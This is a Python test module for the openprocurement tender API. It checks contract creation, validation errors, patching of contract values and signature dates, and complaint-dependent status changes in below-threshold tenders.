:return: SyncGroup or ClientRawResponse if raw=true :rtype: ~azure.mgmt.sql.models.SyncGroup or ~msrest.pipeline.ClientRawResponse :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ # Construct URL url = self.get.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} header_parameters['Accept'] = 'application/json' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.get(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp deserialized = None if response.status_code == 200: deserialized = self._deserialize('SyncGroup', response) if raw: client_raw_response = ClientRawResponse(deserialized, response) return client_raw_response return deserialized get.metadata = {'url': 
'/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}'} def _create_or_update_initial( self, resource_group_name, server_name, database_name, sync_group_name, parameters, custom_headers=None, raw=False, **operation_config): # Construct URL url = self.create_or_update.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} header_parameters['Accept'] = 'application/json' header_parameters['Content-Type'] = 'application/json; charset=utf-8' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct body body_content = self._serialize.body(parameters, 'SyncGroup') # Construct and send request request = self._client.put(url, query_parameters, header_parameters, body_content) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200, 201, 202]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp deserialized = None if 
response.status_code == 200: deserialized = self._deserialize('SyncGroup', response) if response.status_code == 201: deserialized = self._deserialize('SyncGroup', response) if raw: client_raw_response = ClientRawResponse(deserialized, response) return client_raw_response return deserialized def create_or_update( self, resource_group_name, server_name, database_name, sync_group_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config): """Creates or updates a sync group. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param parameters: The requested sync group resource state. 
:type parameters: ~azure.mgmt.sql.models.SyncGroup :param dict custom_headers: headers that will be added to the request :param bool raw: The poller return type is ClientRawResponse, the direct response alongside the deserialized response :param polling: True for ARMPolling, False for no polling, or a polling object for personal polling strategy :return: An instance of LROPoller that returns SyncGroup or ClientRawResponse<SyncGroup> if raw==True :rtype: ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.sql.models.SyncGroup] or ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.sql.models.SyncGroup]] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ raw_result = self._create_or_update_initial( resource_group_name=resource_group_name, server_name=server_name, database_name=database_name, sync_group_name=sync_group_name, parameters=parameters, custom_headers=custom_headers, raw=True, **operation_config ) def get_long_running_output(response): deserialized = self._deserialize('SyncGroup', response) if raw: client_raw_response = ClientRawResponse(deserialized, response) return client_raw_response return deserialized lro_delay = operation_config.get( 'long_running_operation_timeout', self.config.long_running_operation_timeout) if polling is True: polling_method = ARMPolling(lro_delay, **operation_config) elif polling is False: polling_method = NoPolling() else: polling_method = polling return LROPoller(self._client, raw_result, get_long_running_output, polling_method) create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}'} def _delete_initial( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, **operation_config): # Construct URL url = self.delete.metadata['url'] path_format_arguments = { 
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.delete(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200, 202, 204]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response def delete( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, polling=True, **operation_config): """Deletes a sync group. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. 
:type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: The poller return type is ClientRawResponse, the direct response alongside the deserialized response :param polling: True for ARMPolling, False for no polling, or a polling object for personal polling strategy :return: An instance of LROPoller that returns None or ClientRawResponse<None> if raw==True :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ raw_result = self._delete_initial( resource_group_name=resource_group_name, server_name=server_name, database_name=database_name, sync_group_name=sync_group_name, custom_headers=custom_headers, raw=True, **operation_config ) def get_long_running_output(response): if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response lro_delay = operation_config.get( 'long_running_operation_timeout', self.config.long_running_operation_timeout) if polling is True: polling_method = ARMPolling(lro_delay, **operation_config) elif polling is False: polling_method = NoPolling() else: polling_method = polling return LROPoller(self._client, raw_result, get_long_running_output, polling_method) delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}'} def _update_initial( self, resource_group_name, server_name, database_name, sync_group_name, parameters, custom_headers=None, raw=False, **operation_config): # Construct URL url = self.update.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': 
self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} header_parameters['Accept'] = 'application/json' header_parameters['Content-Type'] = 'application/json; charset=utf-8' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct body body_content = self._serialize.body(parameters, 'SyncGroup') # Construct and send request request = self._client.patch(url, query_parameters, header_parameters, body_content) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200, 202]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp deserialized = None if response.status_code == 200: deserialized = self._deserialize('SyncGroup', response) if raw: client_raw_response = ClientRawResponse(deserialized, response) return client_raw_response return deserialized def update( self, resource_group_name, server_name, database_name, sync_group_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config): """Updates a sync group. :param resource_group_name: The name of the resource group that contains the resource. 
You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param parameters: The requested sync group resource state. :type parameters: ~azure.mgmt.sql.models.SyncGroup :param dict custom_headers: headers that will be added to the request :param bool raw: The poller return type is ClientRawResponse, the direct response alongside the deserialized response :param polling: True for ARMPolling, False for no polling, or a polling object for personal polling strategy :return: An instance of LROPoller that returns SyncGroup or ClientRawResponse<SyncGroup> if raw==True :rtype: ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.sql.models.SyncGroup] or ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.sql.models.SyncGroup]] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ raw_result = self._update_initial( resource_group_name=resource_group_name, server_name=server_name, database_name=database_name, sync_group_name=sync_group_name, parameters=parameters, custom_headers=custom_headers, raw=True, **operation_config ) def get_long_running_output(response): deserialized = self._deserialize('SyncGroup', response) if raw: client_raw_response = ClientRawResponse(deserialized, response) return client_raw_response return deserialized lro_delay = operation_config.get( 'long_running_operation_timeout', self.config.long_running_operation_timeout) if polling is True: polling_method = ARMPolling(lro_delay, **operation_config) elif polling is False: polling_method = NoPolling() else: polling_method = polling return LROPoller(self._client, raw_result, get_long_running_output, polling_method) update.metadata = 
{'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}'} def list_by_database( self, resource_group_name, server_name, database_name, custom_headers=None, raw=False, **operation_config): """Lists sync groups under a hub database. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. :return: An iterator like instance of SyncGroup :rtype: ~azure.mgmt.sql.models.SyncGroupPaged[~azure.mgmt.sql.models.SyncGroup] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ def internal_paging(next_link=None, raw=False): if not next_link: # Construct URL url = self.list_by_database.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') else: url = next_link query_parameters = {} # Construct headers header_parameters = {} header_parameters['Accept'] = 
'application/json' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.get(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp return response # Deserialize response deserialized = models.SyncGroupPaged(internal_paging, self._deserialize.dependencies) if raw: header_dict = {} client_raw_response = models.SyncGroupPaged(internal_paging, self._deserialize.dependencies, header_dict) return client_raw_response return deserialized list_by_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups'}
49.535565
225
0.667202
5,262
47,356
5.779932
0.050361
0.035214
0.034655
0.017097
0.919313
0.912244
0.908562
0.902052
0.899323
0.899323
0
0.002589
0.241553
47,356
955
226
49.587435
0.844196
0.276734
0
0.814
0
0.02
0.164848
0.0846
0
0
0
0
0
1
0.048
false
0
0.012
0
0.128
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
6fa28a38a71fc5dfde80bc3ce0cac7121e4b6e4a
183
py
Python
symvarsub/numtransform/__init__.py
bjodah/symvarsub
aebbd3aabdc9f8c345c5892f5d3a0beebbbf906d
[ "BSD-2-Clause" ]
null
null
null
symvarsub/numtransform/__init__.py
bjodah/symvarsub
aebbd3aabdc9f8c345c5892f5d3a0beebbbf906d
[ "BSD-2-Clause" ]
null
null
null
symvarsub/numtransform/__init__.py
bjodah/symvarsub
aebbd3aabdc9f8c345c5892f5d3a0beebbbf906d
[ "BSD-2-Clause" ]
null
null
null
from __future__ import (absolute_import, division, print_function) from .numtransform import NumTransformer from .numtransform import lambdify assert NumTransformer assert lambdify
22.875
66
0.857923
20
183
7.55
0.55
0.211921
0.291391
0
0
0
0
0
0
0
0
0
0.10929
183
7
67
26.142857
0.92638
0
0
0
0
0
0
0
0
0
0
0
0.4
1
0
true
0
0.6
0
0.6
0.2
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
6fe98df84c595217c58f0a5f8c8d963e729a5ace
49,659
py
Python
src/openprocurement/tender/belowthreshold/tests/contract_blanks.py
scrubele/prozorro-testing
42b93ea2f25d8cc40e66c596f582c7c05e2a9d76
[ "Apache-2.0" ]
null
null
null
src/openprocurement/tender/belowthreshold/tests/contract_blanks.py
scrubele/prozorro-testing
42b93ea2f25d8cc40e66c596f582c7c05e2a9d76
[ "Apache-2.0" ]
2
2021-03-25T23:27:04.000Z
2022-03-21T22:18:15.000Z
src/openprocurement/tender/belowthreshold/tests/contract_blanks.py
scrubele/prozorro-testing
42b93ea2f25d8cc40e66c596f582c7c05e2a9d76
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- from datetime import timedelta from copy import deepcopy from openprocurement.api.utils import get_now from openprocurement.tender.belowthreshold.tests.base import test_author # TenderContractResourceTest def create_tender_contract_invalid(self): self.app.authorization = ("Basic", ("token", "")) response = self.app.post_json( "/tenders/some_id/contracts", {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, status=404, ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) request_path = "/tenders/{}/contracts".format(self.tender_id) response = self.app.post(request_path, "data", status=415) self.assertEqual(response.status, "415 Unsupported Media Type") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [ { u"description": u"Content-Type header should be one of ['application/json']", u"location": u"header", u"name": u"Content-Type", } ], ) response = self.app.post(request_path, "data", content_type="application/json", status=422) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"No JSON object could be decoded", u"location": u"body", u"name": u"data"}], ) response = self.app.post_json(request_path, "data", status=422) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Data not available", 
u"location": u"body", u"name": u"data"}] ) response = self.app.post_json(request_path, {"not_data": {}}, status=422) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Data not available", u"location": u"body", u"name": u"data"}] ) response = self.app.post_json(request_path, {"data": {"invalid_field": "invalid_value"}}, status=422) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Rogue field", u"location": u"body", u"name": u"invalid_field"}] ) response = self.app.post_json(request_path, {"data": {"awardID": "invalid_value"}}, status=422) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": [u"awardID should be one of awards"], u"location": u"body", u"name": u"awardID"}], ) def create_tender_contract(self): self.app.authorization = ("Basic", ("token", "")) contract_items = deepcopy(self.award_items) for item in contract_items: item["quantity"] += 0.5 response = self.app.post_json( "/tenders/{}/contracts".format(self.tender_id), { "data": { "title": "contract title", "description": "contract description", "awardID": self.award_id, "value": { "amount": self.award_value["amount"], "valueAddedTaxIncluded": self.award_value["valueAddedTaxIncluded"], "currency": self.award_value["currency"], "amountNet": self.award_value["amount"], }, "suppliers": self.award_suppliers, "items": contract_items, } }, ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") contract = 
response.json["data"] self.assertIn("id", contract) self.assertIn("value", contract) self.assertIn("suppliers", contract) self.assertIn(contract["id"], response.headers["Location"]) self.assertEqual(contract["items"], contract_items) tender = self.db.get(self.tender_id) tender["contracts"][-1]["status"] = "terminated" self.db.save(tender) self.set_status("unsuccessful") response = self.app.post_json( "/tenders/{}/contracts".format(self.tender_id), {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't add contract in current (unsuccessful) tender status" ) self.app.authorization = ("Basic", ("broker", "")) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (unsuccessful) tender status" ) def create_tender_contract_in_complete_status(self): self.app.authorization = ("Basic", ("token", "")) response = self.app.post_json( "/tenders/{}/contracts".format(self.tender_id), {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") contract = response.json["data"] self.assertIn("id", contract) self.assertIn(contract["id"], response.headers["Location"]) tender = self.db.get(self.tender_id) tender["contracts"][-1]["status"] = "terminated" self.db.save(tender) self.set_status("complete") response = self.app.post_json( 
"/tenders/{}/contracts".format(self.tender_id), {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't add contract in current (complete) tender status" ) self.app.authorization = ("Basic", ("broker", "")) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (complete) tender status" ) def patch_tender_contract(self): self.app.authorization = ("Basic", ("token", "")) response = self.app.get("/tenders/{}/contracts".format(self.tender_id)) contract = response.json["data"][0] self.assertEqual(contract["value"]["amount"], contract["value"]["amountNet"]) self.app.authorization = ("Basic", ("broker", "")) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertIn("Can't sign contract before stand-still period end (", response.json["errors"][0]["description"]) self.set_status("complete", {"status": "active.awarded"}) token = self.initial_bids_tokens.values()[0] response = self.app.post_json( "/tenders/{}/awards/{}/complaints?acc_token={}".format(self.tender_id, self.award_id, token), { "data": { "title": "complaint title", "description": "complaint description", "author": test_author, "status": "claim", } }, ) self.assertEqual(response.status, "201 Created") complaint = 
response.json["data"] owner_token = response.json["access"]["token"] tender = self.db.get(self.tender_id) for i in tender.get("awards", []): i["complaintPeriod"]["endDate"] = i["complaintPeriod"]["startDate"] self.db.save(tender) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amountNet": contract["value"]["amount"] - 1}}}, ) self.assertEqual(response.status, "200 OK") self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), { "data": { "contractID": "myselfID", "items": [{"description": "New Description"}], "suppliers": [{"name": "New Name"}], } }, ) response = self.app.get("/tenders/{}/contracts/{}".format(self.tender_id, contract["id"])) self.assertEqual(response.json["data"]["contractID"], contract["contractID"]) self.assertEqual(response.json["data"]["items"], contract["items"]) self.assertEqual(response.json["data"]["suppliers"], contract["suppliers"]) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"currency": "USD"}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Can't update currency for contract value") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"dateSigned": i["complaintPeriod"]["endDate"]}}, status=422, ) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual( response.json["errors"], [ { u"description": [ u"Contract signature date should be after award complaint period end date ({})".format( i["complaintPeriod"]["endDate"] ) ], u"location": u"body", u"name": u"dateSigned", } ], ) one_hour_in_furure = (get_now() + timedelta(hours=1)).isoformat() response = self.app.patch_json( 
"/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"dateSigned": one_hour_in_furure}}, status=422, ) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual( response.json["errors"], [ { u"description": [u"Contract signature date can't be in the future"], u"location": u"body", u"name": u"dateSigned", } ], ) custom_signature_date = get_now().isoformat() response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"dateSigned": custom_signature_date}}, ) self.assertEqual(response.status, "200 OK") response = self.app.patch_json( "/tenders/{}/awards/{}/complaints/{}?acc_token={}".format( self.tender_id, self.award_id, complaint["id"], self.tender_token ), {"data": {"status": "answered", "resolutionType": "resolved", "resolution": "resolution text " * 2}}, ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["data"]["status"], "answered") self.assertEqual(response.json["data"]["resolutionType"], "resolved") self.assertEqual(response.json["data"]["resolution"], "resolution text " * 2) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can't sign contract before reviewing all complaints") response = self.app.patch_json( "/tenders/{}/awards/{}/complaints/{}?acc_token={}".format( self.tender_id, self.award_id, complaint["id"], owner_token ), {"data": {"satisfied": True, "status": "resolved"}}, ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") 
self.assertEqual(response.json["data"]["status"], "resolved") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["data"]["status"], "active") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 232}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (complete) tender status" ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"contractID": "myselfID"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (complete) tender status" ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"items": [{"description": "New Description"}]}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (complete) tender status" ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"suppliers": [{"name": "New Name"}]}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (complete) tender status" ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": 
{"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (complete) tender status" ) response = self.app.patch_json( "/tenders/{}/contracts/some_id?acc_token={}".format(self.tender_id, self.tender_token), {"data": {"status": "active"}}, status=404, ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"contract_id"}] ) response = self.app.patch_json( "/tenders/some_id/contracts/some_id?acc_token={}".format(self.tender_token), {"data": {"status": "active"}}, status=404, ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) response = self.app.get("/tenders/{}/contracts/{}".format(self.tender_id, contract["id"])) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["data"]["status"], "active") self.assertEqual(response.json["data"]["contractID"], contract["contractID"]) self.assertEqual(response.json["data"]["items"], contract["items"]) self.assertEqual(response.json["data"]["suppliers"], contract["suppliers"]) self.assertEqual(response.json["data"]["dateSigned"], custom_signature_date) def patch_tender_contract_value(self): response = self.app.get("/tenders/{}/contracts".format(self.tender_id)) contract = response.json["data"][0] response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), 
{"data": {"value": {"amount": 501}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Amount should be less or equal to awarded amount") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 502, "amountNet": 501}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Amount should be less or equal to awarded amount") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 238}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Amount should be greater than amountNet and differ by no more than 20.0%", ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 100, "amountNet": 80}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Amount should be greater than amountNet and differ by no more than 20.0%", ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 238, "amountNet": 238}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Amount should be greater than amountNet and differ by no more than 20.0%", ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 100, "amountNet": 85}}}, ) self.assertEqual(response.status, "200 OK") 
